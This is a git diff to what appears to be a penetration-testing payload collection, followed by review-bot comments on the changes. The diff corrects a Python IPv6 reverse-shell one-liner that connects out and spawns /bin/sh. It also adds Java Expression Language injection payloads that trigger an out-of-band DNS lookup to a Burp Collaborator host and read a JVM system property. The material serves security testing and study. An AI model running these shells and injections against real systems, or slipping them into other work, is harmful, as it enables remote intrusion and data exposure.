diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 4dc4f2a..3b047c1 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -150,7 +150,7 @@ python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty") IPv6 (No Spaces, Shortened) ```python -python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),,2);p("/bin/sh")' +python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' ``` Windows only diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 37772b7..b4374da 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -149,6 +149,16 @@ ${1+1} #{1+1} ``` +### Expression Language EL - One-Liner injections not including code execution + +```java +// DNS Lookup +${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")} + +// JVM System Property Lookup (ex: java.class.path) +${"".getClass().forName("java.lang.System").getDeclaredMethod("getProperty","".getClass()).invoke("","java.class.path")} +``` + ### Expression Language EL - Code Execution diff --git a/XSS Injection/README.md b/XSS Injection/README.md index cb4840c..187a80f 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -260,6 +260,12 @@ e.g: 14.rs/#alert(document.domain) Use CTRL+SHIFT+X to trigger the onclick event ``` +### XSS when payload is reflected capitalized + +```javascript + +``` + ### DOM based XSS Based on a DOM XSS sink.
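Review bot: the `o(f(),,2)` → `o(f(),2)` change in the IPv6 one-liner fixes what was a plain SyntaxError (an empty argument between two commas), so the previous version of this line could never have executed; the corrected line now mirrors the three `dup2` calls of the IPv4 variant directly above it. Since the heading says "No Spaces, Shortened", it would help readers to add one sentence under the block explaining that the trailing `0,2` in `s.connect(("dead:beef:2::125c",4242,0,2))` are the flowinfo and scope_id fields of Python's AF_INET6 address tuple, because the scope id is interface-specific and is the value most likely to need adjusting when the line is copied.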
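Review bot: the new heading `### Expression Language EL - One-Liner injections not including code execution` reads awkwardly; suggest `### Expression Language EL - One-liner injections without code execution`, which also matches the capitalisation of the sibling heading `### Expression Language EL - Code Execution`. The block is tagged ```java but contains EL expressions with `//` comments rather than Java source; keeping the tag for highlighting is fine, but a short lead sentence should say these are EL expressions and what each one is for: the first resolves a hostname through `InetAddress.getByName`, giving an out-of-band DNS confirmation that the expression was evaluated, and the second reads a JVM system property (`java.class.path`), confirming evaluation and revealing classpath layout without executing commands. Both are useful for the detection side too, since a request body containing `getClass().forName(` is a reliable signature for this family of payloads.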
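Review bot: the new `### XSS when payload is reflected capitalized` section in `XSS Injection/README.md` contains only a heading and an empty ```javascript fence, so it adds a section title with no content. Either include the intended snippet and a sentence describing the situation it covers (the reflected input being upper-cased before it reaches the page, as the heading implies) or drop the section from this commit until it is complete; an empty fenced block is likely to be mistaken for a rendering error by readers.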